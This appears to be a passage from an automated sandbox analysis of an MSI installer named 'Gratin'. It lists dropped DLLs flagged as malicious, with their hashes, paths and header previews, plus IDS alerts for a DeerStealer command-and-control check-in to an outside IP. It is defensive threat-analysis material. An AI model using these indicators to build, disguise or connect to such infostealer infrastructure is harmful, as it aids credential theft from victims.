                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H...........................................P.........................`..................................................X$...p...................@..............................................................x............................text.............................. ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@.......(...................idata..X$.......&...(..............@....edata...............N..............@..@.rdata...............0..............@..@.reloc...............2..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\sqlite3.dll

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):925744
                                                                                                Entropy (8bit):6.531971164117173
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:rRxNAQB74x0FwTuis6eCwjH+SW61zf/AD:ra+syis/LjH+S31E
                                                                                                MD5:9D255E04106BA7DCBD0BCB549E9A5A4E
                                                                                                SHA1:A9BECB85B181C37EE5A940E149754C1912A901F1
                                                                                                SHA-256:02F37A8E3D1790AC90C04BC50DE73CD1A93E27CAF833A1E1211B9CC6294ECEE5
                                                                                                SHA-512:54C54787A4CA8643271169BE403069BC5F1E319A55D6A0EBD84FB0D96F6E9BDDC52B0908541D29DB04A042B531ABD6C05073E27B0B2753196E0055B8B8200B09
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......[...........!.....F...................`.....a................................k3........ .........................w ......0........................:... ...3...................................................................................text...0D.......F..................`.P`.data........`.......L..............@.`..rdata........... ...h..............@.`@.bss....(.............................`..edata..w ......."..................@.0@.idata..0...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...3... ...4..................@.0B/4...........`......................@.@B/19.........p......................@..B/31.................................@..B/45..........0......................@..B/57..........P......................@.0B/70.....i....`..........

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2012160
                                                                                                Entropy (8bit):6.677286319553433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:L2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6T:LRSf0Ww+NpPSyzYY8c8YEPI4+T
                                                                                                MD5:849070EBD34CBAEDC525599D6C3F8914
                                                                                                SHA1:B0543D13F4D0CB787ABDAAF1D3C9A5AF17C87AFA
                                                                                                SHA-256:B6F321A48812DC922B26953020C9A60949EC429A921033CFAF1E9F7D088EE628
                                                                                                SHA-512:F2CA685B01BE9D1B77D8D924E0097DDACEE7628CC1AAD8A87D8B18A699558D38A7851E6CFF8BB2B8AE1980824588AF5C3AC75B7B4198B620144DFF61611F3AEB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................e...............................P...'...`.......................t...@.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225792
                                                                                                Entropy (8bit):6.542140301791508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:F4af8kXL6nX0YXjvkWQ5vYhbNkWPFOEJ8YZbjeTl0Y25zFgYBzRKy6sB65avEtAt:Oaf8kLWL7Xov8bNxdOmrfgYmHA6I
                                                                                                MD5:7DAA2B7FE529B45101A399B5EBF0A416
                                                                                                SHA1:FD73F3561D0CEBE341A6C380681FB08841FA5CE6
                                                                                                SHA-256:2BDF023C439010CE0A786EC75D943A80A8F01363712BBF69AFC29D3E2B5306ED
                                                                                                SHA-512:8E9EC71943C412FE95563E488D91E6EF0041C16A08654FF14B11953F134007657D1E6EC95952F6B9C8B8567A35368840618DB06E5CD99ABC43AE495A3FBC6B96
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H..........................................1P.................................T...................................|......&....P...>...........2...@... ...!..............!................................... ................................text...8........................... ..`.itext.............................. ..`.data...P...........................@....bss....<................................idata..&...........................@....edata...|.......~...R..............@..@.rdata..!...........................@..@.reloc...!... ..."..................@..B.rsrc....>...P...>..................@..@.....................2..............@..@................................................................................................

                                                                                                C:\Windows\Installer\69034d.msi

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Category:dropped
                                                                                                Size (bytes):6766592
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                MD5:829E5E01899CAC6E4326893AFBF5BE82
                                                                                                SHA1:DA638840F3452D74B9118D6C60A5A6CF70B87901
                                                                                                SHA-256:84ABC28B1DA1C2DDF01072FB2817EB446933BA98ECC0DB2228281D6FCFADFF0C
                                                                                                SHA-512:212A35971A38F2800E876882A03E610C074B4918509D06D4A25E9CDEBB1049E7A91BD7E659706914A9584F79943C94CA68F0F3BE7ACF84E056F3910C717C4F03
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Installer\69034f.msi

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Category:dropped
                                                                                                Size (bytes):6766592
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                MD5:829E5E01899CAC6E4326893AFBF5BE82
                                                                                                SHA1:DA638840F3452D74B9118D6C60A5A6CF70B87901
                                                                                                SHA-256:84ABC28B1DA1C2DDF01072FB2817EB446933BA98ECC0DB2228281D6FCFADFF0C
                                                                                                SHA-512:212A35971A38F2800E876882A03E610C074B4918509D06D4A25E9CDEBB1049E7A91BD7E659706914A9584F79943C94CA68F0F3BE7ACF84E056F3910C717C4F03
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Installer\MSI512.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4332
                                                                                                Entropy (8bit):5.6234257649405
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:q59QDOrkss4VsSsgDMZy0L+IfjXceYUae6WMThQqfEPnt:qznrksJV1PwZy0CIfjMe8e6/JWnt
                                                                                                MD5:BFD4A5681A5634DBFEB7B6A0E050A339
                                                                                                SHA1:BA3866E7E6D744DBE39283E9F1C7CA07CBAE9B61
                                                                                                SHA-256:931E895E5B89C1D4AD0D096FAC5C8B65A70195CB6E3720578CF65F8D27870569
                                                                                                SHA-512:096BBA70AB0FA014A6D2B5E8760338A7D7BF593C3DD209255F15C4467C2ACF885A605DA37CF8D0A291F524E3316C31970861833A2FA46919D49F503D358C9485
                                                                                                Malicious:false
                                                                                                Preview:...@IXOS.@.....@..}Y.@.....@.....@.....@.....@.....@......&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}..Gratin..ONHQNHFT.msi.@.....@.....@.....@........&.{F8287FD5-FF2A-4270-84E3-45317986F30E}.....@.....@.....@.....@.......@.....@.....@.......@......Gratin......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E20E89CA-95F6-5DEE-87C2-2010D7F7BD02}2.C:\Users\user\AppData\Local\Temp\Aplanogamete\hso.@.......@.....@.....@......&.{C563E190-FFF5-5EB2-96EE-2ABF7AD28F4C}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll.@.......@.....@.....@......&.{61B0744F-3BCA-52D6-B8E9-FDAED81FE5E3}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe.@.......@.....@.....@......&.{2686B041-402A-53FD-9258-4FE6A6C3E662}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bpl.@.......@.....@.....@......&.{95C0C730-48E2-51E1-AD09-926C08DAB44F}=.C:\Users\j

                                                                                                C:\Windows\Installer\SourceHash{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.162988613293476
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:JSbX72FjVSAGiLIlHVRpfh/7777777777777777777777777vDHF8hZn9B/2utpQ:JCQI5b6j9B/2KF
                                                                                                MD5:50CF505177521B172A04CF24FD2851A1
                                                                                                SHA1:61C764170F82EC6BD526FC68A92AC944B4FC538D
                                                                                                SHA-256:CA9160522E8E44AAACDD3A814CE696323D6145C7FBDBA7F77FEE79C1A6B09D40
                                                                                                SHA-512:03BF1A6C8625E8825AE065AA6088709F08D515C4124B1F3A39C3C7917D58CB7554067E516DDEDC2CF45BE66DEF0DF13F53D0A3258AF34EADA5F675495297F38A
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):432221
                                                                                                Entropy (8bit):5.375189182929696
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpErS
                                                                                                MD5:C6B6E6547826E8316EE5E5786468D635
                                                                                                SHA1:6AC5AF6A16A93EE4AD8CA9FD3EC3586536A936E4
                                                                                                SHA-256:6F0BAEE14848F93132CF5E1C9CAE9F8BED24898A454C836AD29585F040AD0F07
                                                                                                SHA-512:F1DBEEEE7FD697F038E5FEE81249B1541C418BA5253C2A2A81E71318BA39C17FCECD946CE45A56CA5EC1125F9D430618349DD98F900A0EABCBE30DB8C2AA7BA1
                                                                                                Malicious:false
                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                C:\Windows\Temp\~DF047076AF92571CC0.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):0.07056880036279622
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO8XhZntrB/wbIh4Vky6lw:2F0i8n0itFzDHF8hZn9B/Xw
                                                                                                MD5:EF1E213DF84FF32A73BC36C16915EBDE
                                                                                                SHA1:167646A923F6DFCF80CFFC8A521C868D6605450E
                                                                                                SHA-256:06D3D8D0DFAE46262873FE37A0A2203BE99E899DD50BC95530C777CFB0FFB0D4
                                                                                                SHA-512:F90FBD19761D494ED9EEAB2AE1C086F0D834C29F1760B2D4057FF5E9653E82242907A5C66B63BBAFB3476E5518FD5D5A8755679E65DCF3B40BB9C2090DBE96E8
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF1369EE683C65E84B.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF2705E178101D5702.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):1.1901527595610124
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8heuBNveFXJfT5WSHRfwA9US5o0rw9USIMk:Eex3TssRfq6g
                                                                                                MD5:63F905A953F2D8434EDE74D75F1EC5D8
                                                                                                SHA1:62BA59E7864065A9563BE0DA12E346415A0D3015
                                                                                                SHA-256:4667322A1393AC2B38BFCA21996B116AC2733E18FFD7020B65DEB1202F5ED236
                                                                                                SHA-512:122536C8D090F6F1D8702D82A9E0296F004C95CBC8F53F26A6B2E8E2AC2BB116419B99E3BA830B0C9283659917868A6A8C6BE7B45E1F78087E28532B3513FA5D
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF299A0969A324D01B.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF3884A2AA9759B9B5.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF4EC67699B767D2A7.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF7829060056BDA1FA.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DF829F01B324A5209A.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DFE07938702333E9CB.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DFE803764D879E1B29.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):1.1901527595610124
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8heuBNveFXJfT5WSHRfwA9US5o0rw9USIMk:Eex3TssRfq6g
                                                                                                MD5:63F905A953F2D8434EDE74D75F1EC5D8
                                                                                                SHA1:62BA59E7864065A9563BE0DA12E346415A0D3015
                                                                                                SHA-256:4667322A1393AC2B38BFCA21996B116AC2733E18FFD7020B65DEB1202F5ED236
                                                                                                SHA-512:122536C8D090F6F1D8702D82A9E0296F004C95CBC8F53F26A6B2E8E2AC2BB116419B99E3BA830B0C9283659917868A6A8C6BE7B45E1F78087E28532B3513FA5D
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DFEE440BCFF13115EB.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):1.1901527595610124
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8heuBNveFXJfT5WSHRfwA9US5o0rw9USIMk:Eex3TssRfq6g
                                                                                                MD5:63F905A953F2D8434EDE74D75F1EC5D8
                                                                                                SHA1:62BA59E7864065A9563BE0DA12E346415A0D3015
                                                                                                SHA-256:4667322A1393AC2B38BFCA21996B116AC2733E18FFD7020B65DEB1202F5ED236
                                                                                                SHA-512:122536C8D090F6F1D8702D82A9E0296F004C95CBC8F53F26A6B2E8E2AC2BB116419B99E3BA830B0C9283659917868A6A8C6BE7B45E1F78087E28532B3513FA5D
                                                                                                Malicious:false
                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\Temp\~DFF582E36EF7EDD896.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):0.1093475308907446
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wTHMkh92xipVM92xipV7V2BwGilrkgKwF+UH2c:uMkh9USK9US5o0rKwFZH2
                                                                                                MD5:CDF4CAA8A01C7FC178FC9E5FA84989CF
                                                                                                SHA1:2D51723B8760A98167FB1953C6B8095D39724794
                                                                                                SHA-256:94DC82765E08A7F1A32615BC23DC119F11AED0E223F72E441F075F6C5D40A6D9
                                                                                                SHA-512:5DDE86AC266FCE84996D5CA4AF8FC7E62E2AE3487556AC5CE5E6243A39710228F8DC8CEEF6033B8152DD48CBECE7E0DD2E7E0010127026B19CD18816FF276123
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                TrID:
                                                                                                • Microsoft Windows Installer (60509/1) 88.31%
                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 11.69%
                                                                                                File name:ONHQNHFT.msi
                                                                                                File size:6'766'592 bytes
                                                                                                MD5:829e5e01899cac6e4326893afbf5be82
                                                                                                SHA1:da638840f3452d74b9118d6c60a5a6cf70b87901
                                                                                                SHA256:84abc28b1da1c2ddf01072fb2817eb446933ba98ecc0db2228281d6fcfadff0c
                                                                                                SHA512:212a35971a38f2800e876882a03e610c074b4918509d06d4a25e9cdebb1049e7a91bd7e659706914a9584f79943c94ca68f0f3be7acf84e056f3910c717c4f03
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                TLSH:D1663368F9B29178C7DF06326A333586851ACC5DC25AA1236396F78E24733379DBC05E
                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                File Icon

                                                                                                Icon Hash:2d2e3797b32b2b99

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-11-30T02:25:12.480061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449766172.67.141.133443TCP
                                                                                                2024-11-30T02:25:13.319327+01002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.449766172.67.141.133443TCP
                                                                                                2024-11-30T02:25:14.994029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449772172.67.141.133443TCP
                                                                                                2024-11-30T02:25:17.012217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449777172.67.141.133443TCP
                                                                                                2024-11-30T02:25:20.232067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449782172.67.141.133443TCP
                                                                                                2024-11-30T02:25:22.751443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449787172.67.141.133443TCP
                                                                                                2024-11-30T02:25:24.669971+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449792172.67.141.133443TCP
